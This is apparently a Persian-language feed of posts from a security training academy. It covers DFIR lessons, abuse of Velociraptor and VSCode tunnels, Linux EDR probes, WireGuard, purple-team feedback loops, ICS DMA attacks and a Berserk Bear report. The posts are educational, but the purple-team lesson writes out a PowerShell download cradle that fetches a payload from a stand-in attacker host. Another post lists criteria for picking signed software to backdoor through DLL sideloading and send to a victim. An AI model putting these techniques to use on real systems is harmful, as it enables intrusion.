تجربهی مواجهه با سوءاستفاده از ابزارهای DFIR، یک زنگ بیدارباش برای تیم ما بود. این حادثه نشان داد که مهاجمان مدرن، هوشمندانه عمل کرده و از نقاط کور امنیتی ما بهرهبرداری میکنند. ما آموختیم که دفاع مؤثر دیگر تنها به معنای مسدود کردن بدافزارها نیست، بلکه نیازمند درک عمیق "رفتار نرمال" در شبکه و ایجاد هشدار برای هرگونه انحراف از آن است. حرکت به سمت استراتژیهای پیشگیرانهای مانند Application Allowlisting و نظارت رفتاری، گام بعدی و ضروری برای تقویت وضعیت امنیتی هر سازمانی در برابر تهدیدات امروزی است.
#آکادمی_روزبه
ارائه درس سنر ۶۰۸ به همراه درس آموخته ها برای انتقال تجربیات به تمام کارشناسان سازمانها
نرمافزار ایدهآل برای بکدور در راستای DLL Sideloading باید این ویژگیها را داشته باشد:
🔸️ماژولار : طبیعتاً برنامه باید چند فایل DLL داشته باشد که بتوانیم روی آنها بکدور قرار دهیم. منظور ما DLLهای اختصاصی خودِ نرمافزار است، نه DLLهای سیستمی.
🔸️قابل بارگذاری جانبی DLL (DLL Sideloadable) : برنامه باید زمانی که به مسیر دیگری منتقل میشود، در برابر تکنیک DLL sideloading آسیبپذیر باشد.
🔸️کوچک : فراموش نکنید که قرار است این را برای قربانی بفرستیم، پس حجم آن نباید 30 گیگابایت باشد.
🔸️محبوب :باید نرمافزاری رایج باشد، چیزی که سامانه EDR بارها و بارها در سراسر جهان دیده است. مثل ابزارهای فشردهسازی (۷zip، WinRAR)، ویرایشگرهای سبک (Notepad++)، نمایشگرهای PDF، یا نمایشگرهای تصویر.
🔸️دارای امضای دیجیتال (Digitally signed) : برنامه باید معتبر بوده و با گواهی دیجیتال معتبر امضا شده باشد.
#آکادمی_روزبه
معایب و محدودیتهای Port Knocking
عدم رمزنگاری: خود دنباله “در زدن” به صورت متن ساده (Plaintext) در شبکه ارسال میشود و توسط مهاجمی که ترافیک شبکه را شنود میکند (Sniffing) قابل مشاهده است. اگر مهاجم الگو را کشف کند، میتواند از آن برای باز کردن پورت برای خودش استفاده کند.
راه حل: استفاده از تکنیک Single Packet Authorization (SPA) که در آن یک بسته رمزنگاری شده و امضا شده (با کلید متقارن یا نامتقارن) ارسال میشود. ابزارهایی مانند fwknop این کار را انجام میدهند.
آسیبپذیری در برابر حملات Replay: اگر مهاجم دنباله را ضبط کند، میتواند آن را دوباره ارسال (Replay) کرده و پورت را باز کند.
مشکلات در شبکههای پیچیده (مانند NAT): اگر کاربر پشت یک شبکه NAT با چندین کاربر دیگر باشد، باز شدن پورت برای IP عمومی آن شبکه، دسترسی را برای همه کاربران آن شبکه باز میکند.
وابستگی به ترتیب بستهها: در شبکههای پرازدحام، ممکن است بستههای “در زدن” با ترتیب اشتباه به سرور برسند و الگو شناسایی نشود. (استفاده از TCP به جای UDP میتواند این مشکل را تا حدی حل کند).
#آکادمی_روزبه
یاد آموخته ای برای دوستانم
آرام باشیم و سرعت زندگی را کاهش دهیم .
سرعت زندگی را افکار ما تعیین میکند . ممکن است فردی از لحاظ جسمی زندگی آرامی داشته باشد اما از لحاظ عاطفی زندگی پرشتابی داشته باشد. وقتی ذهن ما با آشفتگی از یک نگرش به نگرش دیگر میپرد ، تب آلود میشود، در نتیجه شخص بداخلاق و کم حوصله میگردد.
اگر میخواهید از تاثیر مخرب تحریکات و هیجانات زندگی امروزی دائما در عذاب نباشید باید شتاب زندگی تان را کاهش دهید.
تحریک پذیری بیش از حد در بدن ما سم تولید میکند و موجب بیماری روحی و عاطفی میشود.این میشود که ما از مسائل شخصی تا موارد کشوری وجهانی عصبانی میشویم .
پس آرام یاشید .
حتی در SOC که در ظاهر نشدنی است اما برای جلوگیری از بریدن افراد یا Burnout باید آرامش را حکمفرما کنید.
دهم شهریور ماه ۱۴۰۴ تهران
منبع:
The Power of Positive Thinking
نویسنده: Norman Vincent Peale
تجربه شخصی
سوءاستفاده از Velociraptor برای دسترسی از راه دور
این یکی از آن پروندههایی بود که از همان لحظه اول به من حس خوبی نمیداد. هشدار اولیه، یک Storyline عجیب بود که از تونلینگ در Visual Studio Code خبر میداد. VSCode؟ آن هم روی یک سرور حیاتی؟ عجیب بود.
لحظهای که به سیستم وارد شدم، دیدم ماجرا از یک msiexec ساده شروع شده؛ نصبکنندهای از دامنهی ..... که «اتفاقاً» Velociraptor را نصب کرده بود. ابزار قانونی و محبوب تیمهای DFIR، اما اینبار برای من حکم یک پیک نفوذچی را داشت.
پیکربندی طوری انجام شده بود که Velociraptor مستقیماً به یک C2 مرتبط شود. بعد با یک PowerShell رمزگذاریشده، VSCode دانلود و با گزینهی tunnel اجرا شده بود. این تونل عملاً یک خط مستقیم از سیستم به دست مهاجم باز میکرد. حتی code.exe را به عنوان یک سرویس نصب کرده بودند تا ماندگار شود.
اثری از بدافزار سنتی نبود. فقط ابزارهای قانونی، ولی در دستان اشتباه. این همان نقطهای است که تجربه به من میگوید: «کمترین اثر مخرب = بیشترین نیاز به هوشیاری».
ما سریع سیستم را ایزوله کردیم. بررسىها نشان داد اگر چند ساعت دیرتر عمل میکردیم، این تونل به مسیر مستقیم برای باجافزار ختم میشد.
این حادثه برایم یادآور شد که تهدید امروز لزوماً یک فایل exe ناشناس نیست. گاهی همان ابزاری که دیروز با آن جرمیابی میکردی، فردا میتواند جرمساز باشد
#آکادمی_روزبه
چگونه EDRها در لینوکس کار میکنند: تمرکز بر Kernel Probes و نظارت بر Syscallها
در دنیای امنیت سایبری امروز، ابزارهای Endpoint Detection and Response (EDR) نقش حیاتی در حفاظت از سیستمها ایفا میکنند. EDRها سیستمهایی پیشرفته هستند که فراتر از آنتیویروسهای سنتی عمل کرده و بر تشخیص real-time تهدیدات، جمعآوری دادهها و پاسخ خودکار تمرکز دارند. این ابزارها، مانند CrowdStrike Falcon، Microsoft Defender for Endpoint یا SentinelOne، با نظارت مداوم بر فعالیتهای endpoint (مانند سرورها و دسکتاپها) کار میکنند تا نشانههای نفوذ (Indicators of Compromise یا IOC) را شناسایی کنند. اما چگونه این نظارت عمیق انجام میشود؟
یکی از کلیدیترین مکانیسمها، استفاده از kernel probes است که اجازه میدهد EDRها مستقیماً به لایههای پایین سیستمعامل نفوذ کنند.
مقولهKernel probes، مانند kprobes یا eBPF (extended Berkeley Packet Filter) در لینوکس، ابزاری قدرتمند برای تزریق کدهای نظارتی به نقاط خاصی از کرنل هستند. این probes بدون تغییر کد اصلی کرنل، رویدادها را رهگیری میکنند.
برای مثال، EDRها میتوانند probes را روی syscallهایی مانند keyctl_add_key قرار دهند. این syscall بخشی از زیرسیستم keyring در کرنل لینوکس است که برای افزودن کلیدها یا دادههای حساس به ساختارهای حافظهای volatile استفاده میشود. مهاجمان اغلب از keyring برای مخفیکردن payloadهای مخرب (مانند backdoorها) بهره میبرند، زیرا این دادهها روی دیسک ذخیره نمیشوند و با ریبوت سیستم پاک میشوند.
وقتی EDR یک probe روی keyctl_add_key تنظیم میکند، هر بار که این syscall فراخوانی شود، EDR میتواند پارامترها (مانند نوع کلید، محتوای آن و فرآیند فراخواننده) را ضبط کند. این دادهها به سرور مرکزی EDR ارسال شده و با الگوریتمهای یادگیری ماشین یا قوانین رفتاری تحلیل میشوند. مثلاً اگر یک فرآیند مشکوک (مانند یک shell script مخرب) سعی کند دادهای رمزنگاریشده را به keyring اضافه کند، EDR میتواند آن را بهعنوان فعالیت غیرعادی تشخیص دهد و هشدار دهد یا حتی فرآیند را قرنطینه کند. این رویکرد مشابه “rootkitهای قانونی” است، زیرا EDRها با hooking syscallها و نظارت بر حافظه کرنل، عملاً رفتار مهاجمان را تقلید میکنند اما برای اهداف دفاعی.
علاوه بر probes، EDRها از تکنیکهای دیگری مانند user-space hooking، log aggregation و behavioral analytics استفاده میکنند. برای نمونه، در سناریوی حمله به keyring، EDR میتواند با ترکیب دادههای syscall با لاگهای شبکه یا فایلها، یک زنجیره حمله کامل را بازسازی کند. این قابلیتها EDRها را برای محیطهای پیچیده مانند سرورهای ابری یا سیستمهای IoT ایدهآل میسازد.
با این حال، چالشهایی وجود دارد: تنظیم نادرست probes میتواند عملکرد سیستم را کاهش دهد یا حتی با بهروزرسانیهای کرنل تداخل ایجاد کند. علاوه بر این، مهاجمان پیشرفته ممکن است تکنیکهایی برای دورزدن probes (مانند استفاده از syscallهای جایگزین) بهکار گیرند. در نهایت، EDRها مرز بین تشخیص و پاسخ را کمرنگ کرده و شکارچیهای تهدید را توانمند میسازند تا نفوذهای نامرئی را کشف کنند. با پیشرفت فناوریهایی مانند eBPF، آینده EDRها روشنتر از همیشه است.
#آکادمی_روزبه
درس امروز
چرا وایرگارد سریعتر است ؟
سرعت بالاتر WireGuard نسبت به بعضی VPNهای سنتی (مثل OpenVPN یا IPsec) چند دلیل فنی داره که ترکیبش باعث میشه هم Throughput و هم Latency بهبود پیدا کنه:
1. طراحی مینیمال و کد کوچک
کل کد WireGuardحدود ۴۰۰۰ خط هست (در مقابل صدها هزار خط OpenVPN یا IPsec).
این سادگی به معنی Overhead کمتر در پردازش بستهها، Cache locality بهتر و Debug/Optimization سادهتره.
کمتر بودن لایههای واسط باعث کاهش Context Switch بین فضای کاربر و کرنل میشه.
2. اجرا در کرنل (Kernel Module)
این WireGuard به صورت ماژول کرنلی اجرا میشه، نه یک سرویس User-space سنگین.
پردازش رمزنگاری و مسیریابی بستهها همونجا که پکتها از NIC وارد میشوند انجام میشه.
زمان رفتوبرگشت (Round-trip) داده بین User Space و Kernel Space که در OpenVPN دیده میشه، حذف میشود.
3. استفاده از الگوریتمهای رمزنگاری مدرن و سریع
به جای مجموعهای از الگوریتمهای Legacy، فقط از تعدادی ثابت و بهینه استفاده میکند:
ChaCha20 برای رمزنگاری
Poly1305 برای احراز اصالت پیام
Curve25519 برای تبادل کلید
BLAKE2s برای هش
این الگوریتمها برای اجرا روی CPUهای مدرن (و حتی بدون شتابدهنده AES-NI) بسیار سریع و Cache-friendly هستند.
4. اتصال بدون Session Negotiation پیچیده
این WireGuard فقط نیاز به تبادل کلیده
استاتیک (با مکانیزم مدرن Handshake) دارد.
نیازی به Negotiation چند مرحلهای یا Feature-checking طولانی مثل IPsec نیست.
این باعث کاهش زمان Establishment و تجدید کلیدها میشود.
5. مقوله Stateless در بیشتر مسیرها
وقتی Session فعال شد، مسیر انتقال داده تقریبا بدون بررسیهای سنگین State پیادهسازی میشه.
پکتها وقتی وارد تونل میشن مستقیم رمز شده و از مسیر TUN/TAP رد میشوند؛ پردازش اضافی فایروال یا لایههای کنترل Session کمتر است .
آموزش CISSPتخصصی
#آکادمی_روزبه
درس جمعه برای کلاس سازمانی سنز ۵۹۹ تیم بنفش
تحلیل جامع چرخه بازخورد آنی (Immediate Feedback Loop) در تیم بنفش
۱. تعریف مفهومی: فراتر از یک گزارش ساده
در مدل سنتی (قرمز علیه آبی)، فرآیند به این شکل بود:
تیم قرمز (Red Team): هفتهها یا ماهها حملات شبیهسازی شده را اجرا میکند.
گزارشدهی: در پایان تمرین، یک گزارش مفصل (مثلاً ۵۰ صفحهای) تهیه کرده و به تیم آبی و مدیریت ارائه میدهد.
تیم آبی (Blue Team): گزارش را مطالعه کرده و سعی میکند هفتهها یا ماهها بعد، دفاعها، قوانین و ابزارهای خود را بر اساس آن یافتهها بهبود دهد.
مشکل اصلی این مدل چیست؟
تأخیر زمانی (Time Lag): بین اجرای حمله و اعمال دفاع، فاصله زمانی زیادی وجود دارد. در این فاصله، سازمان همچنان در برابر همان حملات آسیبپذیر است.
فقدان زمینه (Lack of Context): تیم آبی فقط نتیجه را میبیند (مثلاً “دسترسی به سرور X برقرار شد”) اما جزئیات فرآیند حمله (چه ابزاری؟ چه تکنیکی؟ چرا ابزار SIEM آن را ندید؟) را به طور کامل درک نمیکند.
فرصتهای از دست رفته (Missed Opportunities): تیم قرمز ممکن است ۱۰ تکنیک مختلف را امتحان کند و فقط یکی از آنها موفق شود. تیم آبی هرگز از ۹ تلاش ناموفق و اینکه چرا ناموفق بودند، خبردار نمیشود؛ در حالی که این “شکستها” نشاندهنده نقاط قوت دفاعی هستند.
چرخه بازخورد آنی این مدل را کاملاً دگرگون میکند. در این رویکرد:
تعریف: چرخه بازخورد آنی، یک فرآیند همکاری همزمان (Real-time) یا نزدیک به همزمان (Near Real-time) بین تیمهای حمله و دفاع است که در آن، هر اقدام تهاجمی بلافاصله تحلیل شده، قابلیتهای تشخیصی و دفاعی سازمان در برابر آن سنجیده میشود و نتایج به سرعت برای بهبود دفاعی به کار گرفته میشود.
این دیگر یک گزارش پس از عملیات نیست؛ بلکه یک گفتگوی زنده و فنی در حین عملیات است.
۲. آناتومی و اجزای یک چرخه بازخورد آنی
یک چرخه کامل معمولاً شامل این مراحل است که به سرعت تکرار میشوند:
توافق بر سناریو (Hypothesis):
تیم بنفش (حمله و دفاع با هم): “فرض کنیم یک مهاجم با استفاده از تکنیک T1059.001 (PowerShell) قصد اجرای یک اسکریپت مخرب روی سیستم مدیر مالی را دارد. آیا ما میتوانیم این فعالیت را شناسایی و مسدود کنیم؟”
اجرای کنترلشده حمله (Red Team Action):
تیم قرمز: تکنیک مشخص شده را اجرا میکند. مثلاً یک دستور ساده PowerShell برای دانلود یک فایل را اجرا میکند.
شفافیت کامل: تیم قرمز دقیقاً اعلام میکند: “من الان دستور IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1') را روی هاست FINANCE-PC-01 اجرا کردم.”
مشاهده و تحلیل آنی (Blue Team Observation):
تیم آبی: بلافاصله به ابزارهای خود (SIEM, EDR, IDS) نگاه میکند.
سه سوال کلیدی پرسیده میشود:
آیا دیدیم؟ (Visibility): آیا لاگ مربوط به اجرای PowerShell اصلاً ثبت شد؟
آیا هشدار داد؟ (Alerting): آیا این فعالیت یک هشدار امنیتی (Alert) ایجاد کرد؟
آیا مسدود کرد؟ (Prevention): آیا ابزار EDR یا آنتیویروس جلوی اجرای دستور را گرفت؟
بازخورد و نتیجهگیری فوری (Immediate Feedback):
اینجا جادوی کار اتفاق میافتد. تیم آبی بلافاصله پاسخ میدهد:
سناریوی ایدهآل: “بله، EDR ما اجرای دستور را بلاک کرد و یک هشدار با اولویت بالا ایجاد شد. دفاع موفق بود.”
سناریوی رایج: “ما لاگ اجرای PowerShell را در Splunk میبینیم، اما هیچ هشداری تولید نشد. قانون تشخیص ما ضعیف است.”
سناریوی بد: “هیچ چیز ندیدیم! انگار لاگهای اجرای اسکریپت PowerShell اصلاً جمعآوری نمیشوند.”
بهبود و تنظیم آنی (Live Tuning & Refinement):
بر اساس بازخورد بالا، تیم آبی (با کمک تیم قرمز) فوراً اقدام میکند:
در سناریوی رایج: “بیایید با هم یک قانون همبستگی (Correlation Rule) جدید در SIEM بنویسیم که اگر powershell.exe با پارامترهای مشکوکی مثل DownloadString یا -enc اجرا شد، هشدار ایجاد کند.”
در سناریوی بد: “باید پیکربندی Group Policy یا EDR Agent را تغییر دهیم تا لاگبرداری از اسکریپتهای PowerShell فعال شود.”
تکرار و اعتبارسنجی (Re-test and Validate):
تیم قرمز: “بسیار خب، شما قانون جدید را نوشتید / لاگ را فعال کردید. من دوباره همان حمله را اجرا میکنم.”
تیمها چرخه را از مرحله ۳ دوباره تکرار میکنند تا زمانی که به “سناریوی ایدهآل” (تشخیص و هشدار موفق) برسند.
این چرخه برای یک تکنیک واحد ممکن است در عرض چند دقیقه تا یک ساعت کامل شود، نه چند ماه!
ابتدای امنیت : سه شنبه
انتهای امنیت : پنج شنبه
در آکادمی روزبه
با فاند و پشتیبانی شرکت هامون
Www.haumoun.com
Www.Roozbeh.academy
آنجا که نگهبان صنعتی کور میشود: حملات DMA در محیطهای کنترل صنعتی
در قسمت قبل دیدیم که حتی قویترین EDRها در برابر حملات سطح پایین مثل Bootkit یا Firmware در ابتدای راهاندازی سیستم، بسیار آسیبپذیرند. اینبار، به دنیای کنترل صنعتی (ICS/SCADA) میرویم و بررسی میکنیم که چگونه حملات سختافزاری Direct Memory Access (DMA) میتوانند در بطن یک کارخانه یا پالایشگاه، بیسروصدا امنیت را دور بزنند.
مقولهDMA چیست و چرا خطرناک است؟
این DMA قابلیتی در معماری سیستمهای مدرن است که به قطعات جانبی (مثل کارت شبکه، کنترلر ذخیرهسازی یا حتی پورت Thunderbolt) اجازه میدهد مستقیماً به حافظه سیستم (RAM) دسترسی داشته باشند، بدون عبور از CPU و سیستمعامل. این یعنی:
مهاجم میتواند محتویات حساس RAM را بخواند (رمزها، کلیدهای رمزنگاری، دادههای فرآیندی).
یا کد مخرب را مستقیم به حافظه یک فرآیند معتبر تزریق کند، بدون اینکه EDR حتی متوجه شود.
چرا محیطهای صنعتی آسیبپذیرترند؟
برخلاف دیتاسنترها که کنترل فیزیکی بسیار سختگیرانه دارند، محیطهای ICS ویژگیهایی دارند که DMA را از یک تهدید نظری به یک تهدید عملیاتی تبدیل میکند:
1. دسترسی فیزیکی آسانتر
تجهیزات OT (HMIها، ایستگاههای مهندسی، سرورهای Historian) معمولاً نزدیک خط تولید یا در اتاقهای کنترل قرار دارند.
پیمانکاران، اپراتورها و تیم تعمیرات، به این سیستمها دسترسی فیزیکی موقت یا دائم دارند.
2. وجود پورتهای مناسب حمله
بسیاری از HMIها یا ایستگاههای مهندسی، لپتاپ صنعتی یا ورکاستیشن هستند که پورت USB‑C با حالت Alternate Mode، USB 3.x، یا حتی اسلات PCIe خارجی دارند.
برخی PLCها یا کنترلرهای مدرن نیز کارتهای توسعه Mini‑PCIe یا PCIe دارند که در دسترس فیزیکی هستند.
3. دفاع نرمافزاری ضعیفتر
سیستمعاملهای قدیمی (Windows 7، XP Embedded، Linuxهای قدیمی) که Kernel DMA Protection یا IOMMU فعال ندارند، هنوز فراگیرند.
بروزرسانیهای امنیتی سالها عقب افتادهاند، چون تغییر نرمافزار در ICS ریسک توقف تولید دارد.
4. سناریوی پیمانکار آلوده
مهاجم میتواند با لپتاپ خود یا یک دانگل “خدماتی” به سیستم متصل شود (برای آپلود تنظیمات PLC یا مانیتورینگ)، اما در پسزمینه حمله DMA انجام دهد.
ریسکها و پیامدها
وقتی کد مخرب از طریق DMA تزریق شد:
دستکاری فرآیندهای کنترلی بدون شناسایی توسط EDR یا آنتیویروس
تغییر مقادیر Setpoint یا مقادیر حسگرها به شکل مخفیانه
جمعآوری دادههای حساس فرآیندی یا مالکیتی بدون ایجاد هرگونه Log
راهکارهای دفاعی پیشنهادی برای ICS
غیرفعالسازی پورتهای پرسرعت بلااستفاده از طریق BIOS/UEFI.
استفاده از کیسها و رکهای قفلدار با برچسبهای Tamper-Evident.
اجرای سیاست فیزیکی سختگیرانه برای اتصال هر گونه دستگاه پیمانکار.
بهروزرسانی تدریجی سیستمعاملها به نسخههایی که IOMMU و Kernel DMA Protection را پشتیبانی کنند.
آموزش به پرسنل درباره ریسک تجهیزات جانبی ناشناس (USB Drives, Dongles, Adapters).
این هفته دوره های سطح ۱ و CISSP رو شروع میکنم
#جدید
کتابچه شکار تهدید
کمک به شکارچیان تهدید و حتی دانشمندان داده برای اجرای سریع جستجوها و تحلیلها با کوئریهای از پیش آماده در محیطهایی مثل Splunk.
ویژگیها و نکات:
بخشی از مجموعه #SURGe (تیم تحقیقاتی Splunk) است.
بر پایهی چارچوب PEAK Threat Hunting ساخته شده.
حاوی «دستورالعملها» یا SPL Recipes آماده برای وظایف متداول تحلیل و Threat Hunting است.
#ThreatHunting
#آکادمی_روزبه
گزارش VB2021-Slowik با عنوان The Baffling Berserk Bear به بررسی بیش از یک دهه فعالیت گروه Berserk Bear (شناختهشده با نامهایی مانند Dragonfly و Energetic Bear) میپردازد. این گروه از حدود سال ۲۰۱۰ تاکنون به زیرساختهای حیاتی در اروپا و آمریکای شمالی نفوذ کرده است. برخلاف گروههایی مانند Sandworm، تمرکز Berserk Bear بیشتر بر جمعآوری اطلاعات، دسترسی بلندمدت و آمادهسازی برای بحرانهای آینده بوده و کمتر شواهدی از خرابکاری مستقیم وجود دارد.
در موج اول (۲۰۱۰–۲۰۱۴)، آنها با فیشینگ، حملات زنجیره تأمین و exploit kits، بدافزار Havex را منتشر کردند که قابلیت نقشهبرداری شبکههای صنعتی (ICS) و اسکن پروتکلهای صنعتی مانند Modbus را داشت. در برخی موارد، این فعالیتها باعث اختلال ناخواسته در سیستمهای صنعتی شد. در دوره دوم (۲۰۱۵–۲۰۱۹)، تمرکز بر سرقت اعتبارنامهها و استفاده از حملات watering hole بود که بیشتر بخش انرژی اروپا، ترکیه، آمریکا و بریتانیا را هدف گرفت.
از ۲۰۱۹ به بعد، حملات این گروه به حوزههای جدید مانند رسانهها و زیرساختهای مرتبط با انتخابات در اوکراین و آمریکا گسترش یافت، با هدف جاسوسی و نظارت، نه تخریب. دولتهای غربی این گروه را به روسیه و بهویژه FSB مرتبط میدانند. در مجموع، Berserk Bear نمونهای از تهدیدات پایدار دولتی است که بدون سروصدا، زیرساختهای حیاتی را برای نفوذ بلندمدت و سناریوهای احتمالی آینده آماده میکند.
https://vblocalhost.com/uploads/VB2021-Slowik.pdf